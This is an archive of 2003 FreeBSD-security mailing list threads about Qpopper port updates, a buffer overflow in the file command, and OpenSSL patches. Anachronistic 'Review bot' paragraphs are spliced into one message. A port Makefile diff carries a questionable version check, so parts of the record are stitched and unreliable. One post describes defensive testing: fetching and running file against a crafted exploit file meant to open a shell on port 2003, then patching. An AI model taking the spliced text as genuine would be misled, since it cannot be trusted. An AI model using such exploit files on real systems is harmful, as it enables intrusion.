> >jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se
>
> --
> Christopher Schulte
> http://www.schulte.org/
> Do not un-munge my @nospam.schulte.org
> email address. This address is valid.

From owner-freebsd-security Wed Mar 12 11:38:59 2003
Date: Wed, 12 Mar 2003 12:38:41 -0700
To: Mike Tancsa , security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Fwd: Qpopper 4.0.5fc2 available

Has the port been patched? Since it's now the 12th, is the final version up yet?

--Brett

At 08:17 PM 3/11/2003, Mike Tancsa wrote:
>FYI

From owner-freebsd-security Wed Mar 12 11:50:57 2003
Date: Wed, 12 Mar 2003 14:55:43 -0500
To: Brett Glass , security@FreeBSD.ORG
From: Mike Tancsa
Subject: Re: Fwd: Qpopper 4.0.5fc2 available

I don't see the official release yet, but I imagine the guy is on the west coast, so it's not quite afternoon there.

The only patch that does not apply cleanly in the port is the ipv6 patch. As I don't use that, I disabled it. If you want to get things going quickly, here is what I did

checkpoint# diff -u qpopper/Makefile qpopper.new/Makefile
--- qpopper/Makefile Sun Feb 23 14:58:21 2003 +++ qpopper.new/Makefile Wed Mar 12 11:15:08 2003 @@ -6,16 +6,17 @@ # PORTNAME= qpopper -PORTVERSION= 4.0.4 +PORTVERSION= 4.0.5fc2 PORTREVISION= 1 CATEGORIES= mail ipv6 MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ MASTER_SITE_SUBDIR= . old DISTNAME= ${PORTNAME}${PORTVERSION} +WITHOUT_IPV6=Y .include -.if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) +.if ${OSVERSION} >= 900014 && !defined(WITHOUT_IPV6) PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz PATCH_DIST_STRIP= -p1 
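Review bot: the change of the OSVERSION test from 400014 to 900014 duplicates what the added WITHOUT_IPV6=Y line already does, because !defined(WITHOUT_IPV6) is false once that variable is set in the Makefile. Keeping the original 400014 condition and building with make -DWITHOUT_IPV6 would disable the IPv6 patch without leaving a misleading version check behind or hard-coding the knob for every user of the port. PORTREVISION= 1 is also carried over unchanged next to the new PORTVERSION; it is normally reset when PORTVERSION goes up.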
@@ -32,7 +33,8 @@ CONFIGURE_ARGS= --enable-apop=${PREFIX}/etc/qpopper/pop.auth \ --enable-nonauth-file=${POPUSERS_FILE} \ --with-apopuid=pop --without-gdbm \ - --enable-keep-temp-drop + --enable-keep-temp-drop \ + --enable-shy --enable-servermode --enable-log-login PLIST_SUB= EPOPPASSD=${EPOPPASSD} \ POP_USER=${POP_USER} \
checkpoint#

Note, the

+ --enable-keep-temp-drop \
+ --enable-shy --enable-servermode --enable-log-login

Are specific to my setup. And

checkpoint# diff -u qpopper/distinfo qpopper.new/distinfo
--- qpopper/distinfo Mon May 20 19:25:49 2002 +++ qpopper.new/distinfo Wed Mar 12 11:09:31 2003 @@ -1,2 +1,3 @@ MD5 (qpopper4.0.4.tar.gz) = 77f0968cd10b0d5236114838d9f507e5 +MD5 (qpopper4.0.5fc2.tar.gz) = fe1ea4d0e59104af37e513aba0fc7d6e MD5 (qpopper4.0.4-ipv6-20020502.diff.gz) = 62f6b065a040e3fbc31a720746b9efae
checkpoint#

I have been running this on a lesser used server and it seems to function correctly.

---Mike

At 12:38 PM 12/03/2003 -0700, Brett Glass wrote:
>Has the port been patched? Since it's now the 12th, is the final
>version up yet?
>
>--Brett
>
>
>At 08:17 PM 3/11/2003, Mike Tancsa wrote:
> >FYI
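Review bot: the distinfo hunk above adds the MD5 for qpopper4.0.5fc2.tar.gz but keeps the qpopper4.0.4.tar.gz line, which no longer matches anything the Makefile fetches once PORTVERSION is 4.0.5fc2; drop the stale entry so distinfo lists only the files in use. The qpopper4.0.4-ipv6-20020502.diff.gz line is likewise only needed while PATCHFILES is active. Since the new sum covers a release-candidate tarball, it has to be replaced again when 4.0.5 final is out, and anyone applying this should recompute it from their own download rather than copying it from the mail.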
From owner-freebsd-security Wed Mar 12 12: 8:24 2003
Date: Wed, 12 Mar 2003 14:08:24 -0600
To: Brett Glass , Mike Tancsa , security@FreeBSD.ORG
From: Christopher Schulte
Subject: Re: Fwd: Qpopper 4.0.5fc2 available

At 12:38 PM 3/12/2003 -0700, Brett Glass wrote:
>Has the port been patched? Since it's now the 12th, is the final
>version up yet?

Not as of this moment. I built 4.0.5fc2 source with:

# ./configure --enable-apop=/usr/local/etc/qpopper/pop.auth \
 --enable-nonauth-file=/usr/local/etc/qpopper/popusers \
 --with-apopuid=pop \
 --without-gdbm \
 --enable-keep-temp-drop \
 --enable-standalone \
 --with-drac=/usr/local/lib

which should be comparable to

make -DWITH_STANDALONE_MODE -DWITH_DRAC

and then copied popper/popper to /usr/local/libexec/qpopper to run until the port is updated.

>--Brett

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org
email address. This address is valid.

From owner-freebsd-security Wed Mar 12 12:20:10 2003
Date: Wed, 12 Mar 2003 15:24:56 -0500
To: Scott Gerhardt
From: Mike Tancsa
Subject: Re: Qpopper 4.0.5fc2 available
Cc: security@freebsd.org

It does not.

---Mike

At 02:16 PM 12/03/2003 -0600, Scott Gerhardt wrote:
>Off topic, but does the latest Qpopper support MailDir format?

From owner-freebsd-security Wed Mar 12 17:23:24 2003
Date: Wed, 12 Mar 2003 20:28:46 -0500
To: security@freebsd.org
From: Mike Tancsa
Subject: Fwd: Qpopper 4.0.5fc3 available

FYI

>To: Qpopper Public List ,
> qpopper-announce@rohan.qualcomm.com
>From: Randall Gellens
>Subject: Qpopper 4.0.5fc3 available
>
>Qpopper 4.0.5fc3 is available at
>.
>
>The full list of changes from one release to the next is on the FTP site,
>at .
>
>Changes from 4.0.5fc2 to 4.0.5fc3:
>------------------------------
>11. Fixed '-no-mime' appended to user name (reported by Florian
> Heinz).
>12. Fixed response message when identical MDEFs defined multiple
> times (reported by Florian Heinz).
>
>Please check this release out and let me know if you encounter any
>problems. I plan on releasing 4.0.5 tonight if no problem reports are
>received.
>--
>Randall Gellens
>Opinions are personal; facts are suspect; I speak for myself only
>-------------- Randomly-selected tag: ---------------
>It takes a wonderful brain and exquisite senses to produce a few
>stupid ideas. --Santayana

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Wed Mar 12 21:55: 8 2003
Date: Thu, 13 Mar 2003 14:54:55 +0900
From: Hajimu UMEMOTO To: Mike Tancsa Cc: Brett Glass , security@FreeBSD.ORG Subject: Re: Fwd: Qpopper 4.0.5fc2 available In-Reply-To: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> References: <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> User-Agent: xcite1.38> Wanderlust/2.10.0 (Venus) SEMI/1.14.5 (Awara-Onsen) FLIM/1.14.5 (Demachiyanagi) APEL/10.4 Emacs/21.2 (i386--freebsd) MULE/5.0 (=?ISO-2022-JP?B?GyRCOC1MWhsoQg==?=) X-Operating-System: FreeBSD 4.8-RC MIME-Version: 1.0 (generated by SEMI 1.14.5 - "Awara-Onsen") Content-Type: text/plain; charset=US-ASCII X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/) X-Spam-Status: No, hits=-10.0 required=5.0 tests=FWD_MSG,IN_REP_TO,REFERENCES,USER_AGENT version=2.50 X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, >>>>> On Wed, 12 Mar 2003 14:55:43 -0500 >>>>> Mike Tancsa said: mike> I dont see the offical release yet, but I imagine the guy is on the west mike> coast, so its not quite afternoon there. I don't see offcial announce yet, it seems 4.0.5 was out. mike> The only patch that does not apply cleanly in the port is the ipv6 patch. 
I've just updated my IPv6 patch for 4.0.5: http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz Sincerely, -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 4:44:45 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D1E2237B401; Thu, 13 Mar 2003 04:44:41 -0800 (PST) Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF8DE43FBF; Thu, 13 Mar 2003 04:44:40 -0800 (PST) (envelope-from mike@sentex.net) Received: from house.sentex.net (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.12.8/8.12.6) with ESMTP id h2DCiY8X058047; Thu, 13 Mar 2003 07:44:35 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313074005.0659cf80@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 07:42:31 -0500 To: Hajimu UMEMOTO 
From: Mike Tancsa Subject: Re: Fwd: Qpopper 4.0.5fc2 available (4.0.5 (final) is available) Cc: security@FreeBSD.org In-Reply-To: References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:54 PM 3/13/2003 +0900, Hajimu UMEMOTO wrote: >I don't see offcial announce yet, it seems 4.0.5 was out. > >mike> The only patch that does not apply cleanly in the port is the ipv6 >patch. > >I've just updated my IPv6 patch for 4.0.5: > > http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz Hi, it looks to be officially out now. From the qpopper mailing list --------------------------------------- X-Mailer: Eudora for Mac OS X v6.0a Date: Wed, 12 Mar 2003 18:41:52 -0800 Errors-To: List Administrator Precedence: bulk List-Subscribe: List-Unsubscribe: List-Archive: List-Post: List-Owner: Pensive Mailing List Admin List-Help: http://www.pensive.org/Mailing_Lists/ List-Id: List-Software: AutoShare 4.2.3 by Mikael Hansen To: Qpopper Public List , qpopper-announce@rohan.qualcomm.com 
From: Randall Gellens
Subject: Qpopper 4.0.5 (final) available
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Random-Sig-Tag: 1.0b25
Message-Id: <757292525474991735373@lists.pensive.org>
X-Spam-Status: No, hits=0.8 required=4.0 tests=SPAM_PHRASE_00_01 version=2.43
X-Virus-Scanned: amavis-20020220
X-UIDL: .

The full list of changes from one release to the next is on the FTP site,
at .

Changes from 4.0.4 to 4.0.5:
----------------------------
 1. Add debug trace call with OpenSSL library version.
 2. Added 'tls-options' configuration file option.
 3. Added 'tls-workarounds' boolean option.
 4. STLS errors (except for timeout) no longer fatal.
 5. Added sample xinetd configuration file.
 6. Additional checks for networking libraries.
 7. Pick up LDFLAGS from environment, if set.
 8. Added '--enable-32-bit' and '--enable-64-bit'
 9. Applied patch from Jeremy Chadwick to fix pathname trimming
    in standalone mode.
10. Fixed (non-root) buffer overflow.
11. Fixed '-no-mime' appended to user name (reported by Florian
    Heinz).
12. Fixed response message when identical MDEFs defined multiple
    times (reported by Florian Heinz).

-- Randall Gellens -------------------------------------- -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 4:51:39 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CC5DA37B404; Thu, 13 Mar 2003 04:51:36 -0800 (PST) Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 149D243FD7; Thu, 13 Mar 2003 04:51:36 -0800 (PST) (envelope-from mike@sentex.net) Received: from house.sentex.net (cage.simianscience.com [64.7.134.1]) by smtp1.sentex.ca (8.12.8/8.12.6) with ESMTP id h2DCpa8X059414; Thu, 13 Mar 2003 07:51:36 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313074828.07290af0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 07:49:31 -0500 To: obrien@FreeBSD.ORG 
From: Mike Tancsa Subject: MFC of file security fix ? (was Re: Prov. patch for the file hole ISS disclosed) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20030311181452.GA59655@dragon.nuxi.com> References: <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Is there still a plan to MFC this to RELENG_4 ? ---Mike At 10:14 AM 3/11/2003 -0800, David O'Brien wrote: >On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote: > > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > > >Thanks! However, this has already been fixed in -CURRENT (by import > > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > > >time for 4.8-RELEASE. > > > > > > I think this should be merged into the security branches, > > > due to possible remote exploit by third party programs that > > > use file, such as (at the very least) amavis. > > > > I tend to agree. > > > > David? > >Up to you. I'm going to do an MFC for 4.8. I am not very well setup to >test the security branches. Do you want me to just MFC exactly what I >committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for >the 4_7 branch. 
> >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 5:44: 6 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 075C937B401 for ; Thu, 13 Mar 2003 05:43:57 -0800 (PST) Received: from pol.dyndns.org (pol.net1.nerim.net [80.65.225.93]) by mx1.FreeBSD.org (Postfix) with ESMTP id 54BAB43FB1 for ; Thu, 13 Mar 2003 05:43:56 -0800 (PST) (envelope-from guy@device.dyndns.org) Received: from oemcomputer.device.dyndns.org (partserver.pol.local [172.16.10.10]) by pol.dyndns.org (8.12.6/8.12.6) with ESMTP id h2DDhbfO025672; Thu, 13 Mar 2003 14:43:41 +0100 (CET) Message-Id: <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> X-Sender: guy@device.dyndns.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Thu, 13 Mar 2003 14:39:44 +0100 To: amavis-user@lists.sourceforge.net 
From: "Guy P." Subject: Re: [AMaViS-user] ASA-2003-1: Locally Exploitable Buffer Overflow in file Cc: freebsd-security@freebsd.org In-Reply-To: <200303121821.05890.ianjhart@ntlworld.com> References: <20030312103456.GA8977@nmrc.ie> <20030311171324.GA6731@nmrc.ie> <20030312103456.GA8977@nmrc.ie> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by amavis-milter (http://www.amavis.org/) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 19:21 12/03/2003, ian j hart wrote: [snip the original advisory] >FreeBSD: > Guy has posted an alternative patch to freebsd-security > >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=34195+0+current/freebsd-security > >It's white-space broken, but otherwise seems okay. > >My question is, how do I test it? I'm not going to run something I don't >understand, so can we get a test script published with an MD5? > >-- >ian j hart (Note : CCing to freebsd-security for letting them have the non-white-space-broken versions of the patches.) As i had a few questions about patching file for FreeBSD, lemme try to explain how i made the patch, tested it and how it can be used. Anybody feel free to correct me if i did/said something wrong. Hopefully the FreeBSD team will soon fix that in the STABLE sources (CURRENT was already fixed). I made that 'alternative' patch by diffing the official fixed file version from ftp://ftp.astron.com/pub/file against the current FreeBSD-STABLE sources and keeping the changes relevant to that security problem. 

I tried to fix the white space problem and make the patch available as
http://device.dyndns.org/FILE-FREEBSD-STABLE.PATCH , sorry but am not used
to the code writing process under non-windows OSes :]
I also put there, for the paranoid kind, a version that will log what looks
like attempts to exploit that vulnerability, as
http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH

I tested it using a "carefully crafted" test file, built with the exploit
released by "Crazy Einstein" (see
http://marc.theaimsgroup.com/?l=bugtraq&m=104696992100353&w=2 ) and
targeting RedHat 8.0 - thus if your FreeBSD is vulnerable, it would only
crash the file command and not open a shell on port 2003 as intended. The
test file is available as http://device.dyndns.org/badfile , i'd suggest
RedHat users not to try it :)

As requested :
MD5 (FILE-FREEBSD-STABLE-SYSLOG.PATCH) = 57b3b4236051ee1fb2d11978a8fec8b0
MD5 (FILE-FREEBSD-STABLE.PATCH) = 00360e2a756e09b9c2eb7730d769287a
MD5 (badfile) = 7193a290d03fa6bc446fb36cbef0febe

Test & patch process against one of my FreeBSD-STABLE boxes :

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(TESTING)
bash-2.05b$ cd /tmp

bash-2.05b$ fetch http://device.dyndns.org/badfile
Receiving badfile (6304 bytes): 100%
6304 bytes transferred in 0.5 seconds (13.63 kBps)

bash-2.05b$ file badfile
Segmentation fault (core dumped)
(=> file looks like being vulnerable)

(PATCHING)
bash-2.05b$ fetch http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH
Receiving FILE-FREEBSD-STABLE-SYSLOG.PATCH (1137 bytes): 100%
1137 bytes transferred in 0.0 seconds (555.71 kBps)

bash-2.05b$ cd /usr

bash-2.05b$ patch -p0 < /tmp/FILE-FREEBSD-STABLE-SYSLOG.PATCH
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|--- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000
|+++ src/contrib/file/readelf.c.patched Thu Mar 13 14:13:12 2003
--------------------------
Patching file src/contrib/file/readelf.c using Plan A...
Hunk #1 succeeded at 10.
Hunk #2 succeeded at 102.
Hunk #3 succeeded at 145.
done

bash-2.05b$ cd src/usr.bin/file

bash-2.05b$ make
cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE -DHAVE_CONFIG_H -I/usr/src/usr.bin/file -I/usr/src/usr.bin/file/../../contrib/file -c /usr/src/usr.bin/file/../../contrib/file/readelf.c
cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE -DHAVE_CONFIG_H -I/usr/src/usr.bin/file -I/usr/src/usr.bin/file/../../contrib/file -o file file.o apprentice.o fsmagic.o softmagic.o ascmagic.o compress.o is_tar.o readelf.o print-hacked.o
Warning: Object directory not changed from original /usr/src/usr.bin/file

bash-2.05b$ su
Password:

su-2.05b# make install
install -s -o root -g wheel -m 555 file /usr/bin
install -o root -g wheel -m 444 magic magic.mgc /usr/src/usr.bin/file/../../contrib/file/magic.mime magic.mime.mgc /usr/share/misc
install -o root -g wheel -m 444 file.1.gz /usr/share/man/man1
install -o root -g wheel -m 444 magic.5.gz /usr/share/man/man5

su-2.05b# exit
exit

(TESTING again)
bash-2.05b$ cd /tmp

bash-2.05b$ file badfile
badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order, version 1 (SYSV)file: corrupted section header size.
(=> file no longer seems vulnerable)

bash-2.05b$ tail -1 /var/log/messages
Mar 13 14:27:25 wwwback file: file command buffer overflow attempt against user 501/501 ?
(if you used the syslog-able version)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Hope this will be helpful to some of you. Lemme know if anything needs
further talk or whatever.

-- Guy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 6: 9:48 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED43D37B401 for ; Thu, 13 Mar 2003 06:09:44 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2996243FBF for ; Thu, 13 Mar 2003 06:09:43 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 5F7E94BE4 for ; Thu, 13 Mar 2003 08:09:42 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DE8qM30505 for freebsd-security@freebsd.org; Thu, 13 Mar 2003 08:08:52 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 08:08:52 -0600 
From: D J Hawkey Jr
To: security at FreeBSD
Subject: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5
Message-ID: <20030313080852.A30434@sheol.localdomain>
Reply-To: hawkeyd@visi.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hello All.

This is my last hope for "Are the SA-03:02.openssl patches for
RELENG_4_6_2 appropriate for RELENG_4_5?".

After a dry-run, it appears that only the FreeBSD CVS version numbers
keep some half-dozen of the SA-03:02 patches from applying.

FreeBSD released 4.4 with OpenSSL 0.9.6a. FreeBSD released 4.5 with the
same (though it may have had changes?). FreeBSD released 4.6.2 with
OpenSSL 0.9.e.

OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the
source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So
did RELENG_4_6, at p10. Both RELENGs continued to get the same patches
until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7
(p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right?

Therefore: Does anyone know that the SA-03:02 patches for RELENG_4_6_2
should not be applied to a RELENG_4_5 tree (after getting by the above
versioning SNAFU)?

Thanks,
Dave

--
______________________ ______________________
\__________________ \ D. J. HAWKEY JR.
/ __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 6:56:26 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1DD4437B401 for ; Thu, 13 Mar 2003 06:56:21 -0800 (PST) Received: from hermes.pressenter.com (hermes.pressenter.com [209.224.20.19]) by mx1.FreeBSD.org (Postfix) with ESMTP id CD31643FAF for ; Thu, 13 Mar 2003 06:56:17 -0800 (PST) (envelope-from nospam@hiltonbsd.com) Received: from [209.224.36.83] (helo=daggar.sbgnet.net) by hermes.pressenter.com with smtp (Exim 3.16 #1) id 18tU7y-0004ii-00; Thu, 13 Mar 2003 08:56:15 -0600 Date: Thu, 13 Mar 2003 08:56:29 -0600 
From: Stephen Hilton To: "Guy P." Cc: amavis-user@lists.sourceforge.net, freebsd-security@FreeBSD.ORG Subject: Re: [AMaViS-user] ASA-2003-1: Locally Exploitable Buffer Overflow in file Message-Id: <20030313085629.30a015a9.nospam@hiltonbsd.com> In-Reply-To: <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> References: <20030312103456.GA8977@nmrc.ie> <20030311171324.GA6731@nmrc.ie> <20030312103456.GA8977@nmrc.ie> <5.1.1.6.0.20030313132529.041fdec0@device.dyndns.org> X-Mailer: Sylpheed version 0.8.10 (GTK+ 1.2.10; i386-portbld-freebsd4.8) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 13 Mar 2003 14:39:44 +0100 "Guy P." wrote: > At 19:21 12/03/2003, ian j hart wrote: > [snip the original advisory] > >FreeBSD: > > Guy has posted an alternative patch to freebsd-security > > > >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=34195+0+current/freebsd-security > > > >It's white-space broken, but otherwise seems okay. > > > >My question is, how do I test it? I'm not going to run something I don't > >understand, so can we get a test script published with an MD5? > > > >-- > >ian j hart > > (Note : CCing to freebsd-security for letting them have the > non-white-space-broken versions of the patches.) > > As i had a few questions about patching file for FreeBSD, lemme try to > explain how i made the patch, tested it and how it can be used. Anybody > feel free to correct me if i did/said something wrong. > > Hopefully the FreeBSD team will soon fix that in the STABLE sources > (CURRENT was already fixed). > > > I made that 'alternative' patch by diffing the official fixed file version > from ftp://ftp.astron.com/pub/file against the current FreeBSD-STABLE > sources and keeping the changes relevant to that security problem. 
>
>
> I tried to fix the white space problem and make the patch available as
> http://device.dyndns.org/FILE-FREEBSD-STABLE.PATCH , sorry but am not used
> to the code writing process under non-windows OSes :]
> I also put there, for the paranoid kind, a version that will log what looks
> like attempts to exploit that vulnerability, as
> http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH
>
>
> I tested it using a "carefully crafted" test file, built with the exploit
> released by "Crazy Einstein" (see
> http://marc.theaimsgroup.com/?l=bugtraq&m=104696992100353&w=2 ) and
> targeting RedHat 8.0 - thus if your FreeBSD is vulnerable, it would only
> crash the file command and not open a shell on port 2003 as intended. The
> test file is available as http://device.dyndns.org/badfile , i'd suggest
> RedHat users not to try it :)
>
> As requested :
> MD5 (FILE-FREEBSD-STABLE-SYSLOG.PATCH) = 57b3b4236051ee1fb2d11978a8fec8b0
> MD5 (FILE-FREEBSD-STABLE.PATCH) = 00360e2a756e09b9c2eb7730d769287a
> MD5 (badfile) = 7193a290d03fa6bc446fb36cbef0febe
>
>
> Test & patch process against one of my FreeBSD-STABLE boxes :
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> (TESTING)
> bash-2.05b$ cd /tmp
>
> bash-2.05b$ fetch http://device.dyndns.org/badfile
> Receiving badfile (6304 bytes): 100%
> 6304 bytes transferred in 0.5 seconds (13.63 kBps)
>
> bash-2.05b$ file badfile
> Segmentation fault (core dumped)
> (=> file looks like being vulnerable)
>
> (PATCHING)
> bash-2.05b$ fetch http://device.dyndns.org/FILE-FREEBSD-STABLE-SYSLOG.PATCH
> Receiving FILE-FREEBSD-STABLE-SYSLOG.PATCH (1137 bytes): 100%
> 1137 bytes transferred in 0.0 seconds (555.71 kBps)
>
> bash-2.05b$ cd /usr
>
> bash-2.05b$ patch -p0 < /tmp/FILE-FREEBSD-STABLE-SYSLOG.PATCH
> Hmm... Looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000
> |+++ src/contrib/file/readelf.c.patched Thu Mar 13 14:13:12 2003
> --------------------------
> Patching file src/contrib/file/readelf.c using Plan A...
> Hunk #1 succeeded at 10.
> Hunk #2 succeeded at 102.
> Hunk #3 succeeded at 145.
> done
>
> bash-2.05b$ cd src/usr.bin/file
>
> bash-2.05b$ make
> cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE
> -DHAVE_CONFIG_H -I/usr/src/usr.bin/file
> -I/usr/src/usr.bin/file/../../contrib/file -c
> /usr/src/usr.bin/file/../../contrib/file/readelf.c
> cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE
> -DHAVE_CONFIG_H -I/usr/src/usr.bin/file
> -I/usr/src/usr.bin/file/../../contrib/file -o file file.o apprentice.o
